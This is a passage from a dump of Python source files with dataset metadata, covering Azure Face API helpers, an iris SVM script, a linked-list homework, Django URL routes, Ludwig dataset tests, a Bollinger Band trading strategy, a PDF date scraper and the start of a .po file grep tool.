userData, personGroupId):\n    body = dict()\n    body[\"name\"] = name\n    body[\"userData\"] = userData\n    body = str(body)\n    print(body)\n    #Request URL \n\n    FaceApiCreateLargePersonGroup = 'https://testproj.cognitiveservices.azure.com/face/v1.0/persongroups/'+personGroupId \n    try:\n        response = requests.put(FaceApiCreateLargePersonGroup, data=body, headers=headers) \n        return response.status_code\n\n\n    except Exception as e:\n        return e\n\n\ndef createPerson(name, userData, personGroupId):\n    body = dict()\n    body[\"name\"] = name\n    body[\"userData\"] = userData\n
    body = str(body)\n\n    #Request URL \n    FaceApiCreatePerson = ENDPOINT+'face/v1.0/persongroups/'+personGroupId+'/persons'\n\n    try:\n        # REST Call \n        response = requests.post(FaceApiCreatePerson, data=body, headers=headers) \n        responseJson = response.json()\n        personId = responseJson\n        return personId\n    \n    except Exception as e:\n        return e\n\n\ndef addImageForPerson(personId, personGroupId, imgURL):\n    FaceApiAddFace = ENDPOINT+'face/v1.0/persongroups/'+personGroupId+'/persons/'+personId+'/persistedFaces'\n\n    body = dict()\n    body[\"url\"] = imgURL\n    body = str(body)\n\n    try:\n        # REST Call \n        response = requests.post(FaceApiAddFace, data=body, headers=headers) \n        responseJson = response.json()\n        persistedFaceId = responseJson[\"persistedFaceId\"]\n        print(\"PERSISTED FACE ID: \"+str(persistedFaceId))\n        return persistedFaceId\n    \n    except Exception as e:\n        return e\n\n\ndef identifyPerson(image, groupId):\n    faceIdsList = detectedFace(image)\n    FaceApiIdentify = ENDPOINT+'face/v1.0/identify'\n\n    body = dict()\n    body[\"personGroupId\"] = groupId\n    body[\"faceIds\"] = faceIdsList\n    body = str(body)\n\n    try:\n        # REST Call\n        response = requests.post(FaceApiIdentify, data=body, headers=headers) \n        responseJson = response.json()\n        print(responseJson)\n        personId = responseJson[0][\"candidates\"][0][\"personId\"]\n        confidence = responseJson[0][\"candidates\"][0][\"confidence\"]\n        \n        person = getPerson(personId, groupId)\n        return person\n\n    except Exception:\n        return 'Could not detect'\n\n\ndef trainPersonGroup(groupId):\n    body = dict()\n\n    #Request URL \n    FaceApiTrain = ENDPOINT+'face/v1.0/persongroups/'+groupId+'/train'\n\n    try:\n        # REST Call \n        response = requests.post(FaceApiTrain, data=body, headers=headers) \n        return response.status_code\n\n    except Exception as e:\n        return e\n\n\ndef getPerson(personId, personGroupId):\n    getPersonApi = 'https://testproj.cognitiveservices.azure.com/face/v1.0/persongroups/'+personGroupId+'/persons/'+personId\n\n    try:\n        response = requests.get(getPersonApi, headers=headers)\n        responseJson = response.json()\n        print(responseJson)\n        return responseJson\n    except Exception as e:\n        return e\n\n\ndef getGroups():\n    getGroupsApi = ENDPOINT+'face/v1.0/persongroups/'\n\n    try:\n        response = requests.get(getGroupsApi, headers=headers)\n        return response.json()\n\n    except Exception as e:\n        return e","sub_path":"requestApi.py","file_name":"requestApi.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"620474894","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\n\ndf = pd.read_csv(\"http://archive.ics.uci.edu/ml/machine-learning-databases/iris/bezdekIris.data\",\nnames = [\"Sepal Length\", \"Sepal Width\", \"Petal Length\", \"Petal Width\", \"Class\"])\n\nprint(df.head(10))\n\ndf.hist(bins=20)\n\ndata_array=df.values\nnp.random.shuffle(data_array)\nx = data_array[:80][:,0:4]\ny = data_array[:80][:,4]\n\nsvc=SVC()\nsvc.fit(x,y)\n\nX = data_array[-20:][:,0:4]\nY = data_array[-20:][:,4]\n\npred = svc.predict(X)\nprint(pred)\nper=0\nif (pred==Y).all():\n    per=len(Y)\nelse:\n    for i in range(0,len(Y)):\n        if pred[i]==Y[i]:\n
            per+=1\n\n\n","sub_path":"iris_data.py","file_name":"iris_data.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"52454994","text":"\"\"\"\nClass: Python 2020\nHomework Assignment 3\nAuthor: Jin Kim\n\"\"\"\n\n# Initial Node given in the problem\nclass Node:\n    def __init__(self, _value=None, _next=None):\n        self.value = _value\n        self.next = _next\n    def __str__(self):\n        return str(self.value)\n\n# help function to translate integer input to node\ndef NodeFromValue(node, value):\n    this_node = node.value\n    while this_node != None: # iterate over the entire list\n        if this_node.value == value: # if values match\n            return this_node\n        else:\n            this_node = this_node.next # keep iterating\n\n\n# LinkedList class\nclass LinkedList():\n    def __init__(self, value):\n        # takes a number and sets it as the value at the head of the List\n        self.value = value\n        self.size = 1 # initial length of 1\n\n    def length(self):\n        # returns the length of the list\n        return print(\"Length is \" + str(self.size))\n\n    def addNode(self, new_value):\n        # takes a number and adds it to the end of the list\n        # check for correct type\n        if type(new_value) != int:\n            print(\"input must be an integer\")\n        else:\n            # create a new node\n            new_node = Node(new_value) # make a new node\n            # find the end of a list\n            # first, create an object for the current node (root)\n            this_node = self.value\n            # while loop to iterate until end of list (next value = None)\n            while this_node.next != None:\n                this_node = this_node.next # reset the current node\n            # the loop ends when next node is empty\n            # time to add the new node\n            this_node.next = new_node\n            # increase the length\n            self.size += 1\n\n    def addNodeAfter(self, new_value, after_node):\n        # takes a number and adds it after the after_node\n        # check for correct type\n        if type(new_value) != int:\n            print(\"input must be an integer\")\n        else:\n            # find the afternode from integer input\n            afternode = NodeFromValue(node = self, value = after_node)\n            # create a new node with value and link\n            new_node = Node(_value = new_value, _next = afternode.next)\n            # we can insert new node between after_node and its next node\n            afternode.next = new_node\n            self.size += 1\n            print(\"Added \" + str(new_value) + \" after \" + str(after_node))\n\n    def addNodeBefore(self, new_value, before_node):\n        # takes a value and adds it before the before_node\n        # check for correct type\n        if type(new_value) != int:\n            print(\"input must be an integer\")\n        else:\n            # find the beforenode from integer input\n            beforenode = NodeFromValue(node = self, value = before_node)\n            # create a new node linked to the before_node itself (not its value)\n            new_node = Node(_value = new_value, _next = beforenode)\n            # find a node before the before_node\n            # set current node\n            this_node = self.value\n            # if you want to insert before the first node\n            if this_node == beforenode:\n                new_node.next = this_node # make the connection\n                self.value = new_node # reset the root node\n            else:\n                while this_node.next != beforenode:\n                    this_node = this_node.next\n                # we can insert new node between this_node and before_node\n                this_node.next = new_node\n            self.size += 1\n            print(\"Added \" + str(new_value) + \" before \" + str(before_node))\n\n    def removeNode(self, node_to_remove):\n        # find the node_to_remove\n        # transform integer into node\n        that_node = NodeFromValue(node = self, value = node_to_remove)\n        this_node = self.value\n        # if you want to remove the first node\n        if this_node == that_node:\n            self.value = 
this_node.next # reset the root to the next node\n else:\n # iterate until we find the previous node of the node to remove\n while this_node.next != that_node:\n this_node = this_node.next\n # make a link that skips that_node\n this_node.next = that_node.next\n self.size -= 1\n print(\"Removed \" + str(that_node.value))\n\n\n def removeNodeByValue(self, value):\n # takes a value and removes all nodes with that value\n this_node = self.value\n while this_node.next != None: # iterate over the whole list\n if this_node.value == value: # if value matches\n self.removeNode(this_node.value)\n this_node = this_node.next\n\n\n def reverse(self):\n # reverses the order of the linked list\n previous_node = None # start with an empty node\n this_node = self.value # get root node\n while this_node != None: # iterate over the whole list\n next_node = this_node.next # save the next node\n this_node.next = previous_node # switch place\n previous_node = this_node # switch place\n this_node = next_node # move on to the next node\n self.value = previous_node # reset the root\n print(\"Reversed\")\n\n def __str__(self):\n # displays the list in some reasonable way\n lists = \"\"\n this_node = self.value\n while this_node != None:\n lists += str(this_node.value) + \" \"\n this_node = this_node.next\n return lists\n\n# All of these functions iterate over the list until they find some match\n# and execute some move. This is essentially iterating n-1 times and make 1 move,\n# which is complexity O(n). I think it is the best possible complexity class.\n\n##### Tests\nfirst_node = Node(5)\nmy_list = LinkedList(first_node)\nmy_list.addNode(25)\nmy_list.addNode(5)\nmy_list.addNode(5)\nprint(my_list) # should print 5 25 5 5\nmy_list.length() # should be 4\nmy_list.addNode(\"Mon\") # should throw error message\nmy_list.addNodeBefore(9, 5)\nmy_list.addNodeAfter(2, 5)\nmy_list.reverse()\nprint(my_list) # should print 5 5 25 2 5 9\nmy_list.removeNode(5) # removes the first instance of 5\nmy_list.removeNodeByValue(5) # removes all five\nprint(my_list) # should print 25 2 9\nmy_list.length() # should be 3\n","sub_path":"HW/hw5.py","file_name":"hw5.py","file_ext":"py","file_size_in_byte":6275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"546736180","text":"#!/usr/bin/env python\n##\n## Copyright 2009 Adriana Lukas & Alec Muffett\n##\n## Licensed under the Apache License, Version 2.0 (the \"License\"); you\n## may not use this file except in compliance with the License. You\n## may obtain a copy of the License at\n##\n## http://www.apache.org/licenses/LICENSE-2.0\n##\n## Unless required by applicable law or agreed to in writing, software\n## distributed under the License is distributed on an \"AS IS\" BASIS,\n## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n## implied. 
See the License for the specific language governing\n## permissions and limitations under the License.\n##\n\n\"\"\"docstring goes here\"\"\" # :-)\n\nfrom django.conf.urls.defaults import *\n\nimport views as api\nfrom pymine.views import API_CALL, REST\n\nurlpatterns = patterns('',\n\t\t (r'^vurl\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'POST': api.create_vurl,\n\t\t\t\t 'GET': api.list_vurls }),\n\t\t (r'^vurl/(?P[1-9]\\d*)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'DELETE': api.delete_vurl,\n\t\t\t\t 'GET': api.read_vurl,\n\t\t\t\t 'POST': api.update_vurl }),\n\t\t (r'^vurl/(?P[1-9]\\d*)/(?P(__)?[A-Za-z][_A-Za-z]*)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'DELETE': api.delete_vurl_key,\n\t\t\t\t 'GET': api.get_vurl_key }),\n\t\t (r'^version\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'GET': api.read_version }),\n\t\t (r'^url/(?P[1-9]\\d*)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'GET': api.encode_minekey1 }),\n\t\t (r'^url/(?P[1-9]\\d*)/(?P[1-9]\\d*)/(?P\\d+)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'GET': api.encode_minekey3 }),\n\t\t (r'^url/(?P[1-9]\\d*)/(?P\\d+)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'GET': api.encode_minekey2 }),\n\t\t (r'^tag\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'POST': api.create_tag,\n\t\t\t\t 'GET': api.list_tags }),\n\t\t (r'^tag/(?P[1-9]\\d*)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'DELETE': api.delete_tag,\n\t\t\t\t 'GET': api.read_tag,\n\t\t\t\t 'POST': api.update_tag }),\n\t\t (r'^tag/(?P[1-9]\\d*)/(?P(__)?[A-Za-z][_A-Za-z]*)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'DELETE': api.delete_tag_key,\n\t\t\t\t 'GET': api.get_tag_key }),\n\t\t (r'^relation\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'POST': api.create_relation,\n\t\t\t\t 'GET': api.list_relations }),\n\t\t (r'^relation/(?P[1-9]\\d*)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'DELETE': api.delete_relation,\n\t\t\t\t 'GET': api.read_relation,\n\t\t\t\t 'POST': api.update_relation }),\n\t\t (r'^relation/(?P[1-9]\\d*)/(?P(__)?[A-Za-z][_A-Za-z]*)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'DELETE': api.delete_relation_key,\n\t\t\t\t 'GET': api.get_relation_key }),\n\t\t (r'^registry\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'GET': api.list_registry }),\n\t\t (r'^registry/(?P[A-Za-z][_A-Za-z]*)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'POST': api.amend_registry_key,\n\t\t\t\t 'DELETE': api.delete_registry_key,\n\t\t\t\t 'GET': api.get_registry_key }),\n\t\t (r'^item\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'POST': api.create_item,\n\t\t\t\t 'GET': api.list_items }),\n\t\t (r'^item/(?P\\d+)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'DELETE': api.delete_item,\n\t\t\t\t 'GET': api.read_item,\n\t\t\t\t 'POST': api.update_item }),\n\t\t (r'^item/(?P\\d+)/(?P(__)?[A-Za-z][_A-Za-z]*)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'DELETE': api.delete_item_key,\n\t\t\t\t 'GET': api.get_item_key }),\n\t\t (r'^item/(?P\\d+)$',\n\t\t\tREST, { 'GET': api.read_item_data }),\n\t\t (r'^ie/import\\.(?P(zip|tar))$',\n\t\t\tAPI_CALL, { 'GET': api.import_mine }),\n\t\t (r'^ie/export\\.(?P(zip|tar))$',\n\t\t\tAPI_CALL, { 'GET': api.export_mine }),\n\t\t (r'^comment/item/(?P\\d+)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'POST': api.create_comment,\n\t\t\t\t 'GET': api.list_comments }),\n\t\t (r'^comment/(?P[1-9]\\d*)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'DELETE': api.delete_comment,\n\t\t\t\t 'GET': api.read_comment,\n\t\t\t\t 'POST': api.update_comment }),\n\t\t 
(r'^comment/(?P[1-9]\\d*)/(?P(__)?[A-Za-z][_A-Za-z]*)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'DELETE': api.delete_comment_key,\n\t\t\t\t 'GET': api.get_comment_key }),\n\t\t )\n","sub_path":"old/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"545035293","text":"import os\nfrom unittest import mock\n\nimport pandas as pd\nimport pytest\n\nimport ludwig.datasets\nfrom ludwig.datasets.dataset_config import DatasetConfig\nfrom ludwig.datasets.loaders.dataset_loader import DatasetState\n\nSUPPORTED_UNCOMPRESSED_FILETYPES = [\"json\", \"jsonl\", \"tsv\", \"csv\"]\n\n\ndef test_load_csv_dataset(tmpdir):\n input_df = pd.DataFrame(\n {\"name\": [\"Raphael\", \"Donatello\"], \"mask\": [\"red\", \"purple\"], \"weapon\": [\"sai\", \"bo staff\"], \"split\": [0, 1]}\n )\n\n extracted_filename = \"input.csv\"\n compression_opts = dict(method=\"zip\", archive_name=extracted_filename)\n\n archive_filename = os.path.join(tmpdir, \"archive.zip\")\n input_df.to_csv(archive_filename, index=False, compression=compression_opts)\n\n config = DatasetConfig(\n version=1.0,\n name=\"fake_csv_dataset\",\n download_urls=[\"file://\" + archive_filename],\n )\n\n ludwig.datasets._get_dataset_configs.cache_clear()\n with mock.patch(\"ludwig.datasets._load_dataset_config\", return_value=config):\n dataset = ludwig.datasets.get_dataset(\"fake_csv_dataset\", cache_dir=tmpdir)\n\n assert not dataset.state == DatasetState.DOWNLOADED\n assert not dataset.state == DatasetState.TRANSFORMED\n\n output_df = dataset.load()\n pd.testing.assert_frame_equal(input_df, output_df)\n\n assert dataset.state == DatasetState.TRANSFORMED\n ludwig.datasets._get_dataset_configs.cache_clear()\n\n\n@pytest.mark.parametrize(\"f_type\", SUPPORTED_UNCOMPRESSED_FILETYPES)\ndef test_multifile_join_dataset(tmpdir, f_type):\n if f_type != \"jsonl\":\n train_df = pd.DataFrame(\n {\"name\": [\"Raphael\", \"Donatello\"], \"mask\": [\"red\", \"purple\"], \"weapon\": [\"sai\", \"bo staff\"]}\n )\n\n test_df = pd.DataFrame({\"name\": [\"Jack\", \"Bob\"], \"mask\": [\"green\", \"yellow\"], \"weapon\": [\"knife\", \"gun\"]})\n\n val_df = pd.DataFrame({\"name\": [\"Tom\"], \"mask\": [\"pink\"], \"weapon\": [\"stick\"]})\n else:\n train_df = pd.DataFrame([{\"name\": \"joe\"}, {\"mask\": \"green\"}, {\"weapon\": \"stick\"}])\n test_df = pd.DataFrame([{\"name\": \"janice\"}, {\"mask\": \"black\"}, {\"weapon\": \"gun\"}])\n val_df = pd.DataFrame([{\"name\": \"sara\"}, {\"mask\": \"pink\"}, {\"weapon\": \"gun\"}])\n\n # filetypes = ['json', 'tsv', 'jsonl']\n train_filename = \"train.\" + f_type\n test_filename = \"test.\" + f_type\n val_filename = \"val.\" + f_type\n train_filepath = os.path.join(tmpdir, train_filename)\n test_filepath = os.path.join(tmpdir, test_filename)\n val_filepath = os.path.join(tmpdir, val_filename)\n\n if f_type == \"json\":\n train_df.to_json(train_filepath)\n test_df.to_json(test_filepath)\n val_df.to_json(val_filepath)\n elif f_type == \"jsonl\":\n train_df.to_json(train_filepath, orient=\"records\", lines=True)\n test_df.to_json(test_filepath, orient=\"records\", lines=True)\n val_df.to_json(val_filepath, orient=\"records\", lines=True)\n elif f_type == \"tsv\":\n train_df.to_csv(train_filepath, sep=\"\\t\")\n test_df.to_csv(test_filepath, sep=\"\\t\")\n val_df.to_csv(val_filepath, sep=\"\\t\")\n else:\n train_df.to_csv(train_filepath)\n test_df.to_csv(test_filepath)\n 
val_df.to_csv(val_filepath)\n\n config = DatasetConfig(\n version=1.0,\n name=\"fake_multifile_dataset\",\n download_urls=[\"file://\" + train_filepath, \"file://\" + test_filepath, \"file://\" + val_filepath],\n train_filenames=train_filename,\n validation_filenames=val_filename,\n test_filenames=test_filename,\n )\n\n ludwig.datasets._get_dataset_configs.cache_clear()\n with mock.patch(\"ludwig.datasets._load_dataset_config\", return_value=config):\n dataset = ludwig.datasets.get_dataset(\"fake_multifile_dataset\", cache_dir=tmpdir)\n\n assert not dataset.state == DatasetState.DOWNLOADED\n assert not dataset.state == DatasetState.TRANSFORMED\n\n output_df = dataset.load()\n assert output_df.shape[0] == train_df.shape[0] + test_df.shape[0] + val_df.shape[0]\n\n assert dataset.state == DatasetState.TRANSFORMED\n ludwig.datasets._get_dataset_configs.cache_clear()\n","sub_path":"tests/ludwig/datasets/test_datasets.py","file_name":"test_datasets.py","file_ext":"py","file_size_in_byte":4108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"198110112","text":"import pandas as pd\r\nimport numpy as np\r\nimport datetime as dt\r\nimport os\r\nfrom util import get_data\r\nimport matplotlib.pyplot as plt\r\nimport csv\r\n\r\n'''\r\nChart should include\r\n- stock price\r\n- simple moving average\r\n- Upper Bollinger Band\r\n- Lower Bollinger Band\r\n- Long entries (buy 100 shares) as vertical green line at time of entry\r\n- Long exits (sell 100 shares) as vertical black line at time of exit\r\n- Short entries as vertical red line at time of entry\r\n- Short exits as vertical black line at time of exit\r\n\r\nCan only run 1 strategy at a time. For example, if we have already entered a long position (bought 100 shares),\r\nwe must wait until we exit (sell 100 shares) before we can take any other position\r\n'''\r\n\r\n# Using fixed start and end dates with only one stock (IBM)\r\n# Dec 31, 2007 to Dec 31, 2009\r\ndef process_Bollinger_Bands(window_size=20, syms=['IBM'], sd=dt.datetime(2007,12, 31), ed = dt.datetime(2009, 12, 31)):\r\n \r\n prices_dates = pd.date_range(sd, ed)\r\n prices_all = get_data(syms, prices_dates) # Includes SPY\r\n prices_SPY = prices_all['SPY']\r\n prices = prices_all[syms] \r\n prices_orig = prices.copy()\r\n\r\n # Calculate 20 day simple moving average\r\n # Note that the method used will return a vector the same size as\r\n # the input vector. 
However, we are using a 20 day window, so the first\r\n # 20 entries are invalid\r\n prices_array = prices.values\r\n sma = moving_average(prices_array[:,0], window_size)\r\n sma[0:window_size-1] = np.nan\r\n\r\n # Calculate standard deviation of SMA\r\n std_dev = standard_deviation(prices_array[:,0], window_size)\r\n std_dev[0:window_size-1] = np.nan\r\n \r\n # Create upper and lower bands\r\n upper_band = sma + 2*std_dev\r\n lower_band = sma - 2*std_dev\r\n\r\n # Add data to data frame\r\n prices['SMA'] = sma\r\n prices['Upper Band'] = upper_band\r\n prices['Lower Band'] = lower_band\r\n\r\n # Plot data frame\r\n plot_handle = plot_data(prices)\r\n\r\n # Now we need to take this data and find where to make trades\r\n orders = prices_orig.copy()\r\n orders[syms] = np.NaN\r\n generate_orders(prices, orders)\r\n \r\n # Save this off to a csv file\r\n write_csv_file(orders)\r\n\r\n # Add the orders to the plot\r\n add_orders_to_plot(plot_handle, orders)\r\n\r\n plt.show()\r\n#end generate plot\r\n\r\ndef generate_orders(prices, orders, window_size=20, sym='IBM'):\r\n\r\n long_active = False\r\n short_active = False\r\n # For each row (date) in the prices file for which we have\r\n # data to compare \r\n for i in range(window_size, prices.shape[0]):\r\n # Get stock price\r\n price_today = prices[sym][i]\r\n price_yester = prices[sym][i-1]\r\n # Get the value of the upper and lower bands\r\n ub_today = prices['Upper Band'][i]\r\n lb_today = prices['Lower Band'][i]\r\n ub_yester = prices['Upper Band'][i-1]\r\n lb_yester = prices['Lower Band'][i-1]\r\n # Get simple moving average prices\r\n sma_today = prices['SMA'][i]\r\n sma_yester = prices['SMA'][i-1]\r\n\r\n # There are several different scenarios\r\n # 1) Stock price goes from below the lower band to above the lower band we have a long opportunity\r\n # We should buy 100 shares\r\n if (not long_active) and (not short_active) and (price_yester < lb_yester) and (price_today >= lb_today):\r\n orders.iloc[i][sym] = 100.0\r\n long_active = True\r\n # 2) Stock price moves from above the upper band to below the upper band\r\n # This signals the stock is over valued and is returning to mean. 
Short the stock\r\n elif (not long_active) and (not short_active) and (price_yester > ub_yester) and (price_today <= ub_today):\r\n orders.iloc[i][sym] = -100.0\r\n short_active = True\r\n # These two cases handle if a trade is active, when we should exit\r\n # If we are in a long position, sell the stock when the price moves from below the SMA to above the SMA\r\n elif (long_active) and (price_yester < sma_yester) and (price_today >= sma_today):\r\n orders.iloc[i][sym] = -100.0\r\n long_active = False\r\n # If we are in a short position, buy the stock when the price moves from above SMA to below it\r\n elif (short_active) and (price_yester > sma_yester) and (price_today <= sma_today):\r\n orders.iloc[i][sym] = 100.0\r\n short_active = False\r\n #end if\r\n #end for\r\n \r\n # Drop all the entries that don't have values\r\n orders.dropna(inplace=True)\r\n # orders should be pass by reference, so I shouldn't need to return anything here\r\n#end generate_orders\r\n\r\ndef write_csv_file(orders, filename='orders/BBorders.csv'):\r\n with open(filename, 'wb') as csvfile:\r\n orderswriter = csv.writer(csvfile, delimiter=',',\r\n quotechar='|', quoting=csv.QUOTE_MINIMAL)\r\n\r\n # Write header\r\n orderswriter.writerow(['Date'] + ['Symbol'] + ['Order'] + ['Shares'])\r\n \r\n # For each order, write to file\r\n for i in range(0,orders.shape[0]):\r\n # Get the date\r\n current_dt = str(orders.index[i])[0:10]\r\n \r\n # Get the order type\r\n order_type = 'BUY'\r\n if orders.iloc[i]['IBM'] <= 0:\r\n order_type = 'SELL'\r\n\r\n # This is all we need to know. The other data is constant\r\n orderswriter.writerow([current_dt] + ['IBM'] + [order_type] + ['100']) \r\n #end for\r\n #end with\r\n#end write_csv_file\r\n\r\n'''Adds vertical lines to specified plot'''\r\ndef add_orders_to_plot(plot_handle, orders, min=60, max=130):\r\n '''\r\n Since I can only have one order outstanding at a time, I am going to assume\r\n the incoming data is correct. That means that every other order should be\r\n an exit. \r\n '''\r\n long = False\r\n short = False\r\n color = 'k' #black\r\n for i in range(0,orders.shape[0]):\r\n current_date = orders.index[i]\r\n current_order = orders.iloc[i]['IBM']\r\n\r\n # Determine what position (short, long) we are in and set the color\r\n # If we are in neither a long nor a short position\r\n if (not long) and (not short):\r\n # If a sell order comes in, we are short\r\n if current_order < 0:\r\n color = 'r' #red\r\n short = True\r\n # If a buy order comes in, we are long\r\n elif current_order > 0:\r\n color = 'g' #green\r\n long = True\r\n #endif\r\n # Every other order will be an exit, so just set color to black\r\n elif long or short:\r\n color = 'k'\r\n long = short = False\r\n #end if\r\n\r\n plot_handle.plot([current_date, current_date], [min, max], color) \r\n #end for\r\n#end add_orders_to_plot\r\n\r\n''' Computes the moving average of data over the specified window '''\r\ndef moving_average(data, window_size):\r\n output = np.zeros((data.shape[0]))\r\n\r\n for i in range(window_size-1, data.shape[0]):\r\n output[i] = data[i-window_size+1:i+1].mean()\r\n #end for\r\n return output\r\n#end moving_average\r\n\r\n''' Computes standard deviation of data over the specified window''' \r\ndef standard_deviation(data, window_size):\r\n output = np.zeros( (data.shape[0]) )\r\n\r\n for i in range(window_size-1, data.shape[0]):\r\n output[i] = np.std( data[i-window_size+1:i+1], ddof=1 )\r\n #end for\r\n\r\n return output\r\n#end standard_deviation\r\n\r\n'''Plots data. 
Returns handle to plot'''\r\ndef plot_data(df, title=\"Stock prices\", xlabel=\"Date\", ylabel=\"Prices\"):\r\n \r\n ax = df.plot()\r\n ax.set_xlabel(xlabel)\r\n ax.set_ylabel(ylabel)\r\n \r\n return ax\r\n#end plot_data\r\n","sub_path":"ML4Trading/ml4t/mc2_p2/bollinger_strategy.py","file_name":"bollinger_strategy.py","file_ext":"py","file_size_in_byte":7734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"200551835","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 10 14:27:16 2019\n\n@author: gabrieleusan\n\"\"\"\n\nimport os\nfrom os import path\nimport PyPDF2 \nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom glob import glob \nimport pandas as pd\nimport textract\nimport numpy as np\n\nos.chdir(\"/Users/gabrieleusan/Desktop/approval_letters/2008\")\n\nstop_words = ['January', 'February', 'March', 'April', 'May', 'June', 'July',\n 'August', 'September', 'October', 'November', 'December']\n\nfor i in range(1,32):\n stop_words.append(str(i))\n\nfor i in range(1900, 2020):\n stop_words.append(str(i)) \n\nmonths = ['January', 'February', 'March', 'April', 'May', 'June', 'July',\n 'August', 'September', 'October', 'November', 'December']\n\ndef find_ext(dr, ext):\n return glob(path.join(dr,\"*.{}\".format(ext)))\n\npdfs = find_ext(\".\",\"pdf\")\n\nnda_dates = {}\n\nfor pdf in pdfs:\n filename = pdf\n pdfFileObj = open(filename,'rb')\n pdfReader = PyPDF2.PdfFileReader(pdfFileObj)\n num_pages = pdfReader.numPages\n count = 0\n text = \"\"\n\n while count < num_pages:\n try:\n pageObj = pdfReader.getPage(count)\n count +=1\n text += pageObj.extractText()\n except TypeError:\n pass\n except IndexError:\n pass\n \n# if text != \"\":\n# text = text\n##If the above returns as False, we run the OCR library textract to #convert scanned/image based PDF files into text\n# else:\n# text = textract.process(filename, method='tesseract', language='eng')\n \n \n keyword = 'dated'\n text = text.partition(keyword)\n text = text[2]\n \n tokens = word_tokenize(text) \n keywords = [word for word in tokens if word in stop_words]\n n = 6\n nda_number = [filename[i:i+n] for i in range(2, len(filename), n)] \n nda_number = nda_number[0]\n \n date = keywords[:3]\n date = pd.to_datetime(date[0] + '/' + date[1] + '/' + date[2])\n \n nda_dates[nda_number] = date\n \n \ndf = pd.DataFrame(nda_dates, index=[0]).T.reset_index()\ndf.rename(columns={'index':'nda_num', 0:'submission_date'}, inplace=True)\n \nprint(df.head())\n","sub_path":"scraping_code.py","file_name":"scraping_code.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"98263992","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n#******************************************************************************\n# Copyright (C) 2017-2018 Hitoshi Yamauchi\n# New BSD License.\n#******************************************************************************\n# \\file\n# \\brief grep for pofiles\n#\n# Description:\n# Get specific pattern entries in the po file. 
You can search\n# depending on the key type.\n#\n# Example:\n# Grep on msgid with keyword 'this' for file _other_.po\n# ./pogrep.py --key-type msgid -e this _other_.po\n#\n# Get exercise decimals-in-words for file learn.math.cc-fourth-grade-math.exercises-ja.po\n# ./pogrep.py --key-type tcomment -e decimals-in-words learn.math.cc-fourth-grade-math.exercises-ja.po\n#\nimport argparse, sys, re, codecs, os\nimport polib\n\nclass Pogrep(object):\n    \"\"\"grep on pofile.\n    Search depends on keytype: msgid, msgstr, comment, tcomment\n    Output matching entries\n    \"\"\"\n\n    def __init__(self, opt_dict):\n        \"\"\"constructor\n        \"\"\"\n        self.__opt_dict = opt_dict\n        self.__is_verbose = self.__opt_dict['verbose']\n\n        # key type\n        self.__key_type = self.__opt_dict['key_type']\n        if (self.__key_type == None):\n            raise RuntimeError('No key type specified')\n        valid_key_type = ['msgid', 'msgstr', 'comment', 'tcomment']\n        if (self.__key_type not in valid_key_type):\n            raise RuntimeError('Invalid key_type')\n        self.__verbose_out('# key_type: {0}'.format(self.__key_type))\n\n        # regexp\n        restr = self.__opt_dict['regexp']\n        if (restr == None):\n            raise RuntimeError('No regexp specified')\n        ignore_case_str = ''\n        if (self.__opt_dict['ignore_case'] == True):\n            self.__recomp = re.compile(restr, flags=re.IGNORECASE)\n            ignore_case_str = 'with ignore case'\n        else:\n            self.__recomp = re.compile(restr)\n        self.__verbose_out('# regexp: {0} {1}'.format(restr, ignore_case_str))\n\n        # invert match\n        self.__match_true = not self.__opt_dict['invert_match']\n        self.__verbose_out('# match true (!invert_match): {0}'.format(self.__match_true))\n\n        # in_file\n        self.__in_file = self.__opt_dict['in_file']\n        if (self.__in_file == None):\n            raise RuntimeError('No input file')\n\n        self.__verbose_out('# in_file: 